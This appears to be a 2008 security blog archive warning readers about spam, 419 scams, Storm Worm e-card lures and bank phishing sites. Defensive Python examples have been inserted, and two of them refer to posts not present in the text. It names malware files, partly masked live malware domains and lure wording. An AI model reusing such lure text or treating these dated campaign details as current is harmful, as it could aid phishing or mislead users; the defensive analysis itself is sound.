As they say, "Keep 'em peeled!", which means keep your eyes open and stay alert. Or, as others might say, "don't believe everything you see or read"; it may be a clever fake.

If you see any other interesting new tricks/techniques or file formats being used by spammers then please feel free to send me the details or post the information as a comment. Thanks!


Thursday, 28 February 2008

Out of Office Notifications Are...

An accident waiting to happen!

In fact a number of these accidents have already happened. But I'm getting ahead of myself. So, why do I think that they are inherently bad?

Personally, I hate out of office notifications, not because it means that I can't get a reply from the person I sent an e-mail to in the first place, but because they can be misused, by not just the person who is 'Out of the Office' but also by the 'Bad Guys and Girls'. Let me explain in more detail what I mean...

1. Too Much Information
Often when people enable 'Out of Office' they offer too much information; such as when they are going and coming back, and where they are going to. They also often include a second person's details to contact in their absence; including their full e-mail address. This is then often enabled for all incoming e-mail to their e-mail address, which means that not only internal [company/organisation] colleagues are informed, but also, in many cases anyone on the internet that sends them e-mail. The next two points explain in more details why this is a 'bad' thing.

2. Confirmation that your e-mail address exists
As mentioned above, if you enable your 'Out of Office' notification to send an automatic response to all e-mail that is received, you are assisting spammers, scammers and malware authors by confirming that the e-mail address is in use [that makes it worth more]. If you also include another person's details to contact while you are away, then the 'Bad Guys and Girls' can also harvest that to either sell on for profit to others, misuse it themselves, or often both. The end result is more spam, scams and malware arriving in your inbox and that of anyone else you kindly supplied in your 'Out of Office' notification; I'm sure that they will be quick to thank you for all the extra 'crud' they are now receiving ;-)

3. Physical and Cyber attacks while you are 'away'.
If you are unwise enough to indicate you are on holiday or just out of the country where you normally reside, then the 'Bad Guys and Girls' can do a number of things whilst you are not at home. If they have enough data on you, then you could come back to find your house burgled, full of squatters, vandalised or even worse.

If they don't have access to that level of information then they can hack into your personal webspace, social networking and other web sites you may use. They could also perform a 'Joe Job' or a 'DDoS' to discredit you or damage your business or reputation. While you are away they may use your stolen identity to take out loans, credit cards and even mortgages in your name. If they already have some of your financial data, such as bank account or credit card data, you could suddenly find your bank account empty or unauthorised charges [and ATM withdrawals] on your debit or credit cards.

In all these cases listed above, this is only likely to happen if you have come to their attention; such as being a thorn in their side, or making life difficult for them, or someone else is willing to pay for the information and/or attacks to take place.

If you don't believe that these things happen, then I can assure you that many of the cyber attacks happen to many of us who work in computer security, especially those that are widely published or who work for anti-malware companies or in law-enforcement.


Figure 1: Too Much Information is an Invitation for Trouble!

4. Bounced Spam
This is the latest way that 'Out of Office' notifications can be mis-used and it affects all of us who are already on spammers/scammers and malware authors lists (or soon will be).

Here is the scenario:
The Bad Guys or Girls sign up for a free webmail account, at say, Google, Yahoo, Live, etc. and then enable the 'Out of Office' feature. They then place the spam message they want to distribute in the 'Out of Office' e-mail body.

Next, the spammer sends lots of e-mails to this new webmail account [with the 'Out of Office' feature enabled], using spoofed 'From:' addresses, so that the 'Out of Office' reply is sent to the intended victim [the spoofed From: address].

Why do this? Well, e-mail sent from this booby-trapped spamming webmail account will carry the provider's anti-spam header information, such as DKIM, DomainKeys, Sender ID or any of the other similar systems, which means that the mail server handling the intended victim's e-mail is more likely to let the spam through, as it appears to have come from a trusted source.

This is now easier for the spammers to do, as the CAPTCHA systems used by Yahoo and Googlemail have been cracked; so that they can now automate the creation of these 'trusted' 'Out of Office' spam relays.


Figure 2: Out of Office Spam Setup

So, next time you go to enable your 'Out of Office' feature, think carefully about what information you provide, and if you can do not enable the respond to internet address option, as you may live to regret it!
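The policy this post argues for, written out as an added example (this is not the blog's code, nor any mail provider's): reply only to senders in your own domains, never to automated or bulk mail, at most once per sender, keep dates and colleagues' addresses out of the reply text, and mark the reply as auto-generated in the way RFC 3834 describes so that other systems can tell it from first-class mail. The internal domain, the reference time and every sample message below are constructed for the demonstration.

```python
import email
import email.utils
import re
from datetime import datetime, timedelta
from email import policy
from email.message import EmailMessage

INTERNAL_DOMAINS = {"corp.example"}   # constructed: the organisation's own domains
REPLY_WINDOW = timedelta(days=7)      # at most one auto-reply per sender per window
NOW = datetime(2008, 2, 28, 9, 0)     # constructed reference time for the demo

# Constructed sample messages, one per rule the policy applies.
SAMPLES = {
    "internal": "From: alice@corp.example\nTo: bob@corp.example\nSubject: Q1 figures\n\nSee attached.\n",
    "external": "From: Someone <someone@webmail.example>\nTo: bob@corp.example\nSubject: Grant\n\nYou won.\n",
    "bulk": "From: news@corp.example\nTo: bob@corp.example\nPrecedence: bulk\nSubject: Newsletter\n\nHi.\n",
    "auto": "From: alice@corp.example\nTo: bob@corp.example\nAuto-Submitted: auto-replied\nSubject: Auto\n\nAway.\n",
    "bounce": "Return-Path: <>\nFrom: MAILER-DAEMON@corp.example\nTo: bob@corp.example\nSubject: Undelivered\n\nFailed.\n",
}


def parse(raw):
    return email.message_from_string(raw, policy=policy.default)


def sender_of(msg):
    """Envelope sender (Return-Path) if present, else From; '' for a null sender."""
    header = str(msg.get("Return-Path") or msg.get("From", "")).strip()
    if header in ("", "<>"):          # null sender: a bounce or other DSN
        return ""
    return email.utils.parseaddr(header)[1].lower()


def should_autoreply(msg, sent_log, now):
    """Decide whether to auto-reply; sent_log maps sender -> time of the last reply."""
    sender = sender_of(msg)
    if not sender:
        return False, "null sender (bounce)"
    # Never answer automated mail: no reply loops, and no acting as a relay
    # for a message whose From: was forged so that the reply lands on someone else.
    if str(msg.get("Auto-Submitted", "no")).lower() != "no":
        return False, "auto-submitted"
    if str(msg.get("Precedence", "")).lower() in ("bulk", "list", "junk"):
        return False, "bulk precedence"
    if msg.get("List-Id") is not None or msg.get("List-Unsubscribe") is not None:
        return False, "mailing list"
    # The post's main advice: do not respond to internet addresses at all.
    if sender.rpartition("@")[2] not in INTERNAL_DOMAINS:
        return False, "external sender"
    last = sent_log.get(sender)
    if last is not None and now - last < REPLY_WINDOW:
        return False, "already replied this window"
    sent_log[sender] = now
    return True, "internal sender, first reply this window"


_ADDRESS = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
_DATE = re.compile(r"\b\d{1,2}(?:st|nd|rd|th)?\s+(?:jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec)\w*"
                   r"|\b\d{1,2}/\d{1,2}/\d{2,4}\b", re.I)
_AWAY = re.compile(r"\b(?:holiday|vacation|abroad|overseas|travelling|traveling|on leave)\b", re.I)


def too_much_information(body):
    """Warn about the details point 1 of the post says a reply should not carry."""
    warnings = []
    if _ADDRESS.search(body):
        warnings.append("names a colleague's e-mail address")
    if _DATE.search(body):
        warnings.append("gives dates of absence")
    if _AWAY.search(body):
        warnings.append("reveals travel or absence from home")
    return warnings


def build_reply(original, body):
    """Build the auto-reply, marked (RFC 3834) so other autoresponders do not answer it."""
    reply = EmailMessage()
    reply["To"] = str(original.get("From", ""))
    reply["Subject"] = "Auto: " + str(original.get("Subject", ""))
    reply["Auto-Submitted"] = "auto-replied"
    reply["Precedence"] = "bulk"
    reply.set_content(body)
    return reply


def demo_decisions(now=NOW):
    """Run every sample through the policy; returns {name: (reply?, reason)}."""
    log = {}
    out = {name: should_autoreply(parse(raw), log, now) for name, raw in SAMPLES.items()}
    out["internal_repeat"] = should_autoreply(parse(SAMPLES["internal"]), log, now + timedelta(days=1))
    out["internal_next_window"] = should_autoreply(parse(SAMPLES["internal"]), log, now + REPLY_WINDOW)
    return out


if __name__ == "__main__":
    for name, (ok, why) in demo_decisions().items():
        print(f"{name:22} reply={ok!s:5} {why}")
    print(too_much_information("On holiday until 14th March; contact jane@corp.example"))
```

The body check is deliberately blunt (a month name or an address is enough to warn); the point is that a safe reply says only that mail will be dealt with on return, and the headers set in build_reply are what let the receiving side recognise the message as an autoresponse rather than something a person sent.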


Thursday, 21 February 2008

A Right Royal Grant?

Wow, according to the e-mail I received today I have been awarded a grant of half-a-million pounds [£500,000.00], not just from any old society or company, but from one calling itself 'Queen Elizabeth's Foundation'!

I'm honoured that I have personally come to the attention of our country's ruling monarch, and what's more, she feels that I deserve half-a-million in cash with her head on it all...

Here's a screenshot of the e-mail, so that you can see it for yourself, and bask in my glory:



OK, yes I'm not really being serious, or getting too big for my boots, or thinking that I'm now above you all ;-) I know it is a scam and I'm just playing along.

So, let me start by checking out if the domain that the email claims to be sent from actually has a website:



Nope, no website, most odd! OK, so let me now check to see who the domain is registered with and to whom:



If I didn't already know that this was a 419 scam, then I would by now, so let me dig deeper. Next, let me check out the phone numbers, they look real and they are, but they are not registered to any charity or person, they are so-called 'personal' numbers being offered for FREE by the following company:



So, what do we know so far? There is no such society or organisation, the telephone numbers given are real but suspect, they have no website and the domain isn't even registered [so how could they send e-mail from it?], and finally they want me to reply to a different e-mail address, and they can't make their mind up as to who I should be replying to, is it:
Rooney James or Williams Anderson?

To get to the bottom of the mystery of where the e-mail was sent from, I took a quick peek at the raw headers, and what did I find? I found that the e-mail was actually sent via the webmail service of the company shown in the final screenshot, below:



Yes, they sent the e-mail using a webmail service based in Hawaii, for the United Kingdom monarch whose name is used for an organisation that doesn't exist, doesn't have a website or own a domain at all, and they want me to reply to an e-mail account hosted on Microsoft Live, just so that they can send me half-a-million quid!

So, do you smell a rat now, or would you send them the data they ask for?

Just to be crystal clear about this: There is no money, as usual, this is a scam which has been around in one format or another for many years, all that happens if you get caught up with these scammers is that you will lose money, not gain any.

Just because they use the name of the Queen of the United Kingdom, and names of well known real organisations such as UNICEF, doesn't mean that this is real [even if the money actually existed, which it doesn't]. This is just another twist in 'The Game' that is collectively known as 419 or Advance-Fee-Fraud.

Sorry, Your Majesty, but I'm going to have to turn down your kind offer...


Tuesday, 12 February 2008

FREE Greetings FOR YOU !!!

Looks like a busy day for me today, just what I need, not!

Here's a screenshot of another tempting* email that I've received this afternoon:



If you are foolish enough to click on the link in the email, you'll end up being offered a file called 'greeting.exe', this file appears to be hosted on the free web-hosting service called ZeroCatch. Here's a screenshot of the default page for the sub-domain hosting the file. As you can see the malware author couldn't even be bothered to put a basic page together:



So, I hear you all ask, do you get FREE Greetings, as promised? Nope, all you'll get is an infected PC for your trouble, although it will be FREE! ;-)

At the time of posting this blog entry the detection of the offered 'greeting.exe' file was very poor, with only 6 out of 32 tested scanners identifying that this is a malicious file.

Furthermore the file being offered appears to be a static binary, as in my testing so far all samples downloaded are the same size and produce the same MD5.

[*] Only really tempting if I had a lobotomy or suffered other severe head or brain trauma which seriously affected my common-sense.


Another Stormy Valentine's Day...

...Coming To A PC Near You, Soon!

I hope that you are all ready for a safe and pleasant, if not wonderful, Valentines Day on Thursday?

It seems that the so-called 'Storm Worm Gang' are back playing cupid again and couldn't resist the opportunity to try and get you to infect your computer, once again using the guise of a Valentine e-card. The latest wave of these started early this morning:

The subjects of the e-mails I've seen so far include:

Blind Love
Heart pump
Love Rose
Phone Love
With All My Love
Valentine Friends
Happy Valentine's day!
The love Train
You're Super Sweet
Me & You

The body of all the e-mails seen so far contain a single line of text and a URL [the usual dotted IP sort, e.g. http://100.123.12.1], here are just a small selection of the text I've seen used so far:

A Hearty Wish
Love You
My Heart
Rockin' Valentine
Smiley Kiss
You Stay In My Heart
Valentine Friends

Here's a screenshot of one of the e-mails that I've received this morning:



If you are foolish enough to click on the link in the email, you'll end up on a page that looks like one of these [these are not all the known permutations], the graphic shown on the website is randomly chosen from a pool of at least 6:







And here is the source of the web page currently in use:



However you spend the day, whatever you do for the 'love-of-your-life', don't become part of the collateral damage of the annual 'Valentine's Day [Malware] Massacre'.

If I see anymore 'bogus' Valentine's Day e-mails, I'll try and post details here when I can. Also, if you see any that I haven't yet posted about, then please let me know.

Hopefully, between us we can try and keep the annual massacre down to a mere scuffle! ;-)

At the time of posting this blog entry the detection of the offered 'valentine.exe' file was very poor, with only 4 out of 32 tested scanners identifying that this is a malicious file.

Furthermore the file being offered is not a static binary, as in my testing so far each request ends up serving a file which appears to be different in size, I'm not sure whether this is a case of server-side polymorphism or just a pool of pre-compiled executables from which one is chosen at random.
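The size-and-hash reasoning used here and in the 3D screensaver post above, as an added example (not the blog's own tooling): every download is fingerprinted, the downloads are grouped, and the pattern of repeats says whether the server hands out one static file, a small pool of pre-built files, or something different on every request. The byte strings standing in for samples are constructed and carry nothing executable; the three screensaver filenames are the ones the earlier post lists.

```python
import hashlib
from collections import defaultdict

# Constructed stand-ins for downloaded samples (not real malware bytes).
SCREENSAVER_RUN = [                      # every download identical, as in the March post
    ("Screensaver-66713.scr", b"MZ" + bytes(range(64)) * 4),
    ("Screensaver-8719.scr",  b"MZ" + bytes(range(64)) * 4),
    ("Screensaver-83580.scr", b"MZ" + bytes(range(64)) * 4),
]
VALENTINE_RUN = [                        # every download different, as in this post
    ("valentine.exe#%d" % i, b"MZ" + bytes([i]) * (200 + 7 * i)) for i in range(4)
]
POOLED_RUN = VALENTINE_RUN[:2] + VALENTINE_RUN[:2] + VALENTINE_RUN[:1]   # two files, served repeatedly


def fingerprint(blob):
    """Size and MD5 as the posts record, plus SHA-256 (MD5 is no longer collision-resistant)."""
    return (len(blob), hashlib.md5(blob).hexdigest(), hashlib.sha256(blob).hexdigest())


def classify_downloads(downloads):
    """Group repeated downloads by fingerprint and say what the repetition pattern implies.

    downloads: list of (filename, bytes), one entry per request made to the server.
    Returns (verdict, number of distinct files, {fingerprint: [filenames]}).
    """
    groups = defaultdict(list)
    for name, blob in downloads:
        groups[fingerprint(blob)].append(name)
    distinct = len(groups)
    if distinct == 1:
        verdict = "static"     # one file under many names
    elif distinct == len(downloads):
        verdict = "unique"     # server-side polymorphism, or a pool larger than the sample
    else:
        verdict = "pool"       # a few pre-built files handed out at random
    return verdict, distinct, dict(groups)


if __name__ == "__main__":
    for label, run in (("screensaver", SCREENSAVER_RUN), ("valentine", VALENTINE_RUN), ("pooled", POOLED_RUN)):
        verdict, distinct, _ = classify_downloads(run)
        print(f"{label}: {len(run)} downloads, {distinct} distinct -> {verdict}")
```

A handful of downloads cannot distinguish a large pool from true server-side generation; only a repeat (the "pool" verdict) is positive evidence, so the useful habit is to keep requesting until either a fingerprint recurs or the count of distinct files makes a pool implausible.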

If I get any further useful data or news then I'll try and update this entry later today or tomorrow.

UPDATE: The URLs [Web links] included in the e-mail may also now be domain names containing the word 'moon' which I will omit from the web links I have seen so far, see below:

  • [the-m-word]starfood.com
  • destroythe[the-m-word].com
I suspect that others will appear shortly, please do not go to those domains as they contain live malware, you have been warned!


Friday, 1 February 2008

Presenting at The University of Loughborough...

Once more I have been asked to present at a conference, this time it is one being held at the University of Loughborough in Leicestershire.

So, this is another one for me to add to my collection of Universities I've presented/lectured at. These include: The Open University and Warwick University.

This presentation is on Rootkits, and is an updated version of the one I gave at the Virus Bulletin 2006 conference in Montreal, Canada. If you are interested in finding out more about rootkits, then the paper can be found here: http://momusings.com/papers

As usual you will not only find the Rootkit paper there, but also all my published papers and magazine articles too.

I'm hoping that the weather doesn't cause any issues with the trains, and that the rails have been repaired after this morning's crash on the same line!

For those of you that are interested, here is a link to the UCISA website covering the details and agenda for the event.

The travel time from where I live is about 3.5 hours each way, so I will probably leave home about 6AM and won't get back until around 9PM, still I might get a chance to write some of my EICAR 2008 paper, or at least some abstracts for the Virus Bulletin 2008 conference.


Thursday, 31 January 2008

Stealthed Spam, Redux!

I originally covered this back in October of 2007, but things have, as usual, recently repeated themselves, the spammers that is. This time the stealthed spam is different, as new approaches and techniques have been used. However, first a quick recap of what I mean by stealth:

"Here's an interesting trick that the spammers are increasingly using to defeat not only software and hardware anti-spam defences but also "wetware" anti-spam defences; wetware is the geek/nerd term for you, dear reader, the interface between the chair and the keyboard. ;-)

Stealth is not a new idea; computer viruses and other malware have been using techniques to hide since the very beginning of the problem on IBM and compatible PCs. In fact the very first virus on this platform, 'Brain', used stealth. Also, most of you are aware that stealth is widely used by the military, not only to make warplanes invisible [or almost] to radar and other tracking technologies, but also warships."

So, now you know what I mean by stealth, so what does stealth spam look like, well guess what, you can't see it at first as it is stealthed [hidden], here's some recent examples so you can see what I mean:

The first one claims to be from 'Media Inc.':



The second one claims to be from 'Windows Live Hotmail':



The third and final one claims to be from 'A Credit-Card Company':



With all of the above examples, all the URLs [web-links] used in the e-mail point to the spammy site, and the To and From e-mail addresses used tend to be the same, that being yours! All the text is probably taken from real newsletters/e-mails/websites. These e-mails pass the tests that most of us use to decide if something is spam or not; in other words they pass the 'Eyeball' test fairly easily as they look like genuine e-mails from real companies. The only missing pieces are any remote graphics, which most e-mail programs will not show, at least not by default.

So, what do they look like when I enable 'allow remote images' in the e-mail program?

They look like this:







Yes, you aren't seeing double, the second and third example produce the same result when viewed in an HTML capable e-mail reader or web browser.

Now they all fail the 'Eyeball' test with ease.

Why do I call these 'Stealthed Spam'? Well, simply because the spam component is hidden and not in plain view.

The final screenshot shows part of the HTML source of the final example shown above when it is only showing the image:



You can clearly see the other HTML, which doesn't get shown when rendered in a browser or a HTML e-mail reader.

As they say, "Keep 'em peeled!", which means keep your eyes open and stay alert. Or, as others might say, "don't believe everything you see or read"; it may be a clever fake.

If you see any other interesting new tricks/techniques or file formats being used by spammers then please feel free to send me the details or post the information as a comment. Thanks!
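The signals described in this post and in the March 2008 'Redux II' post above (links and sender that don't belong together, From and To identical, and the spam itself carried by a remote image) can be checked before any image is fetched. The script below is an added example, not the blog's code: it parses a message with Python's standard email and HTML libraries and reports those signals. The two messages, the domains and the addresses in it are constructed samples modelled on the posts, and the "organisation" check is a deliberately rough last-two-labels comparison.

```python
import email
import email.utils
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the bank-themed example: sender and links
# disagree, and the real "content" is a remote image from a third host.
STEALTHED = """\
From: "Example Bank and Trust" <admin@pills.example>
To: victim@example.com
Subject: RE: February 83% OFF
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Welcome to Example Bank and Trust online banking. Please read our
<a href="https://www.bank.example/privacy">privacy policy</a> or
<a href="https://www.bank.example/contact">contact us</a>.</p>
<img src="http://cdn-pile.example/offer.gif" alt="">
</body></html>
"""

# Constructed benign newsletter: sender, links and image host all agree.
BENIGN = """\
From: "Example Bank News" <news@bank.example>
To: victim@example.com
Subject: Your February statement is ready
Content-Type: text/html; charset="utf-8"

<html><body><p>Your statement is available in
<a href="https://www.bank.example/statements">online banking</a>.</p>
<img src="https://images.bank.example/logo.png" alt="logo"></body></html>
"""


class _HtmlAudit(HTMLParser):
    """Collect visible-text length, link hosts and remote image hosts from HTML."""

    def __init__(self):
        super().__init__()
        self.text_chars = 0
        self.link_hosts = set()
        self.image_hosts = set()
        self._hidden = 0            # nesting depth inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "style"):
            self._hidden += 1
        elif tag == "a" and a.get("href"):
            host = urlparse(a["href"]).hostname
            if host:
                self.link_hosts.add(host.lower())
        elif tag == "img" and a.get("src"):
            host = urlparse(a["src"]).hostname
            if host:                # cid:/data: images have no host and are not remote
                self.image_hosts.add(host.lower())

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._hidden:
            self._hidden -= 1

    def handle_data(self, data):
        if not self._hidden:
            self.text_chars += len(data.strip())


def _org(host):
    """Rough registrable domain: the last two labels (an approximation, fine for the demo)."""
    return ".".join(host.lower().split(".")[-2:])


def _addr(msg, name):
    return email.utils.parseaddr(str(msg.get(name, "")))[1].lower()


def audit_message(raw):
    """Return stealthed-spam signals for a raw RFC 5322 message string."""
    msg = email.message_from_string(raw, policy=policy.default)
    html_part = msg.get_body(preferencelist=("html",))
    if html_part is None:
        return {"suspicious": False, "reasons": [], "note": "no HTML part"}
    audit = _HtmlAudit()
    audit.feed(html_part.get_content())

    from_addr, to_addr = _addr(msg, "From"), _addr(msg, "To")
    from_org = _org(from_addr.rpartition("@")[2]) if from_addr else ""
    link_orgs = {_org(h) for h in audit.link_hosts}
    # Remote images from an organisation that neither the sender nor any link
    # belongs to: the classic hiding place for the spam payload.
    off_brand_images = sorted(h for h in audit.image_hosts
                              if _org(h) != from_org and _org(h) not in link_orgs)
    # Links outside the sender's organisation: either borrowed text with the
    # spammer's sender, or a borrowed sender with the spammer's links.
    off_brand_links = sorted(h for h in audit.link_hosts if _org(h) != from_org)
    from_equals_to = bool(from_addr) and from_addr == to_addr

    reasons = []
    if off_brand_images:
        reasons.append("remote image(s) served from a third-party host")
    if off_brand_links:
        reasons.append("links do not match the sender's domain")
    if from_equals_to:
        reasons.append("From: and To: are identical")
    return {"suspicious": bool(reasons), "reasons": reasons,
            "off_brand_images": off_brand_images, "off_brand_links": off_brand_links,
            "from_equals_to": from_equals_to, "visible_text_chars": audit.text_chars}


if __name__ == "__main__":
    for label, raw in (("stealthed", STEALTHED), ("benign", BENIGN)):
        print(label, audit_message(raw))
```

Nothing here needs the images loaded, which is the point: the hidden part of a stealthed spam is only hidden from the eyeball test, not from the headers and the HTML source the mail client already has.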


Monday, 28 January 2008

Paper Selected For The EICAR 2008 Conference

EICAR have informed me that my abstract has been selected for the EICAR 2008 conference to be held in Laval, France between the 3rd and the 6th of May.

The abstract for the paper appears below:
The increasing speed of new malware strains being written and released means that security professionals are more likely than ever before to see new malware.

This means new malware which is not detected by the anti-malware solutions they have deployed in their infrastructure, be it workstation, server, PDA or at the gateway.

Imagine this scenario: An end-user calls the helpdesk and reports that their system is running very sluggishly when it wasn't a week ago and that they can't access the Windows 'Task Manager' or open a command prompt any more.

Is this caused by malware or is it a 'user' problem? The virus scanner is right up to date and active, and it says the system is clean, the personal firewall is active too. Where do you go from here? Investigate or rebuild the box?

How can you tell if the machine is clean or infected by a new malware, with a reasonable level of confidence for your conclusion?

This paper will look at what tricks, tools and techniques you can use to help establish the true state of the 'suspect' system. It will focus on a step by step approach of what tools to use, what to look for and what to do with any suspicious files. It will also discuss the use of forensic tools in such a scenario, as a last port of call.

The paper will draw on real scenarios where new [undetected] malware has been responsible for 'odd' system or network behaviour.

All I have to do now, is carry out all the required research and write the paper; should only take me about 3 months. However, as usual they need the completed paper by the 17th of March!

I've several other ideas for abstracts already sketched out, ready to submit for this year's Virus Bulletin conference. Any topics that you think should be covered are most welcome; just drop me a note or leave a comment.


Saturday, 26 January 2008

A Shocking Mobile Call...

I often receive e-mails from people who are either just forwarding the latest chain mail, urban legend, hoax or scam e-mail, or sending them to me to ask my opinion, as I have seen many of these types of e-mails over the last 15 years and can usually spot the real ones from the fake ones very quickly.

So, yesterday I was sent the following in an e-mail by someone asking me if it was a hoax or not:



What do you think, real or hoax?

Before I give you my answer, I would like to bring to your attention the following data:

  • Most phones use power adapters that step down the voltage from standard mains [usually in the range of 110-240 Volts] to something significantly lower [usually in the range of 3-12 Volts]; not only that, these power adapters usually have a very low amperage [a quick look at several of the ones I have on hand shows that 200mA is fairly typical].

  • There have been a number of reports of exploding mobile phones [well, actually batteries] over the last few years.

  • Most phone manufacturers' instruction manuals contain information which states that it is perfectly safe to use a mobile phone while it is being recharged.


My conclusion is that if this did happen then the phone and/or the power adapter were faulty or damaged and that this caused the effect allegedly witnessed; either that, or the building that the person was in at the time suffered a lightning strike which fed into the mains circuit. However, no such data is supplied and therefore it is almost impossible to corroborate or give any credence to this report. I therefore conclude that it is a hoax.

If you still think it is real and not a hoax, then I'd suggest you read the full debunk which can be found here:
http://www.snopes.com/horrors/techno/cellcharge.asp

Tuesday, 15 January 2008

From Storm With Love...

It seems that the Storm Worm Gang have decided that you all need some loving, so they are now sending out fake e-card e-mail notifications informing you how much they love you, because you make their job of building botnets so easy ;-)

Either that or their calendar is screwed up again; they almost missed Christmas and were then very early for New Year!

Here's a screenshot of what just one of these new With Love based e-mails looks like:



The body text can be one of a number of text strings. The rest of the e-mail is usually a link; this time they have gone back to using IP addresses rather than actual domain names, I'm not sure why. The IP addresses used are varied, so don't assume that they use just the one shown in the example here.

Of course, when you click on the link you go to a very nice, but fake e-card site.

Here is a screenshot of the web page you could end up on if you click on the link in one of these fake With Love themed e-mails.



Here's a screenshot showing the HTML source for the page, does it look familiar? It should as this is almost exactly the same code used during the New Year campaign.



The message shown is fake; the 'withlove.exe' file offered isn't an e-card offering words of love from an admirer, partner or colleague. In other words, if you are unwise enough to download the file and run it you won't get to see an e-card; in fact you will get a bot installed instead and your computer will join one of the many Storm Worm botnets.

At the time of publishing this entry detection was almost non-existent, with most of the top anti-virus products not detecting the malware-laden file as infected; you have been warned.

As mentioned before, please do not go to these sites and download the files offered, as they are real, live, malware.

More details on the file currently being offered can be found here on my VSUB blog, complete with detection results at the time of publishing.

MySpace Storm...

It seems that the Storm Worm Gang have finally changed their social engineering tactic from the New Year e-cards that we have been seeing since the 26th of December until the 2nd of January when they sent out their last new version of that particular tactic!

So, what are they now using to get you to infect your computer? They are using fake MySpace invite e-mails which contain links to phishing quality fake MySpace websites.

This seems rather spooky as I was blogging about social network engineering on the 4th of January!

Here's a screenshot of what just one of these new MySpace based e-mails looks like:


The body text can be one of a number of fake names and text strings. The rest of the e-mail, including the links, appears to be fairly static, at the moment anyway. Once more the link is an actual domain name, rather than the more usual IP address based links that the Storm Worm gang used to use.

Of course, when you click on the link you go to a very professional, but fake MySpace site.

Here is a screenshot of the web page you could end up on if you click on the link in one of these fake MySpace themed e-mails.



In fact there are several links in the e-mail which take you to different domain names, all under the control of the Storm Worm gang.

Here's another example showing another domain name in use.



The message shown is fake; the 'install_flash_player.exe' file offered isn't genuine. In other words, if you are unwise enough to download the file and run it you won't get a copy of Flash Player installed; in fact you will get a bot installed instead and your computer will join one of the many Storm Worm botnets.

Just to make it crystal clear, the file offered on this site will NOT install or update Flash Player; all that will happen is that your computer will be infected and turned into a zombie [a bot-infected computer that is part of a botnet], if it is not protected by any mitigating technologies, such as up-to-date anti-virus, and so on.

At the time of publishing this entry detection was still very patchy, with a number of the top anti-virus products not detecting the malware-laden file as infected; you have been warned.

As mentioned before, please do not go to these sites and download the files offered, as they are real, live, malware.

More details on the file currently being offered can be found here on my VSUB blog, complete with detection results at the time of publishing.

No doubt I'll be updating this post in the next day or so, as the Bad Guys and Girls tinker with their latest social engineering technique, or they change it to a new one...

As I post this I have now received over FIFTY of the fake MySpace invite e-mails!

Tuesday, 8 January 2008

New Year Phishes?

As a customer of Barclays Bank in the UK, I do occasionally receive e-mails from them, so I wasn't that surprised, or unduly alarmed when I received the e-mail shown in the screenshot below:



A quick look at it had my Phish Sense tingling; can you see why?

However, as usual, I decided to take a look at the URL in the e-mail in more detail, as it was pretty believable. This is what I found:



This could easily be the real Barclays Bank site, it is very well done and very believable. In fact all the links, bar one, on the web page actually do go to the real Barclays web site. So, what happens if you enter data in the page and click on the Next button, where do you go next?

The next page shown is:



You are then prompted for the rest of your personal login details for Barclays. However, once you have filled them in and clicked on the Login button, you will end up on the real Barclays site. So this Phish, because that is what it is, no matter how good or believable it appears, is actually carrying out a Man-In-The-Middle attack by harvesting your real login data for your Barclays internet banking account.

Last night I also started to see a similar attack aimed at the Halifax, here's a screenshot of the e-mail:



And here is the website the link takes you to:



This one uses the same technique, although it appears that not only is the page harvesting your Halifax credentials it also goes on to pass them to the real Halifax site, and so, if the data you gave was genuine, it should have logged you in, and you probably would be none the wiser that you have become the latest victim of a phishing attack.

If you put in fake data in the fake Halifax login page (shown above), the real Halifax site will show you an error message.

If you use an e-mail client that doesn't show you the bracketed e-mail address, then it is not surprising that customers of these banks, using these e-mail clients, actually fall for these latest phishing scams, with disastrous results ranging from transferred funds, new loans or mortgages taken out in their name, to their whole identity being stolen.

Did you notice that the links in the e-mail claim to be HTTPS [an SSL encrypted link to the website], when in fact they end up on a standard HTTP link which is NOT encrypted, so all data you enter is sent in CLEAR TEXT?
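The two tell-tales just described, a bracketed sender address that disagrees with the display name and a link whose visible text claims HTTPS while the real href goes to plain HTTP on another host, are easy to check mechanically. The following is an added example written for this post, not code from the original blog; the e-mail it inspects is constructed, with example.net standing in for the phisher's host.

```python
import re
import email
from email import policy
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed sample: display name says "Barclays", bracketed address does not,
# and the link text shows https://www.barclays.co.uk/ but the href is plain HTTP.
SAMPLE_EMAIL = """\
From: "Barclays Online Banking" <security-update@example.net>
To: customer@example.org
Subject: Please verify your account
Content-Type: text/html; charset=utf-8

<html><body><p>Dear customer, please confirm your details at
<a href="http://login.example.net/barclays/">https://www.barclays.co.uk/</a></p>
</body></html>
"""

# Matches <a ... href="URL" ...>visible text</a>; adequate for simple HTML mail.
ANCHOR_RE = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)


def phish_indicators(raw_message, legitimate_domains):
    """Return indicator strings for one raw e-mail; legitimate_domains is the bank's."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []

    # Indicator 1 (the bracketed address): the display name may claim the bank
    # while the real address, shown between < and >, lives somewhere else.
    name, addr = parseaddr(msg["From"])
    sender_domain = addr.rsplit("@", 1)[-1].lower()
    if name and not any(sender_domain == d or sender_domain.endswith("." + d)
                        for d in legitimate_domains):
        findings.append(f"display name '{name}' but sender domain '{sender_domain}'")

    # Indicator 2 (the HTTPS claim): compare what the link text shows with
    # where the href actually goes, both the scheme and the host.
    body = msg.get_body(preferencelist=("html",))
    for href, text in ANCHOR_RE.findall(body.get_content() if body else ""):
        real, shown = urlparse(href), urlparse(text.strip())
        if shown.scheme == "https" and real.scheme == "http":
            findings.append(f"link text claims HTTPS but href is plain HTTP: {href}")
        if shown.hostname and shown.hostname != real.hostname:
            findings.append(f"link text shows {shown.hostname} but href goes to {real.hostname}")
    return findings


if __name__ == "__main__":
    for line in phish_indicators(SAMPLE_EMAIL, ("barclays.co.uk",)):
        print("INDICATOR:", line)
```

Run against the constructed message it reports all three indicators; a genuine mail whose sender and href both sit under the bank's domain reports none.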

Please note: Do NOT go to the sites shown as they are real live phishing sites. You have been warned! Stay safe...

Whatever you do, don't take this threat lightly, as TV presenter and motor-mouth Jeremy Clarkson did after dismissing the threat of identity theft; he foolishly published his bank details and clues to other personal details in his column in The Sun newspaper. More details on this can be found here.

Friday, 14 December 2007

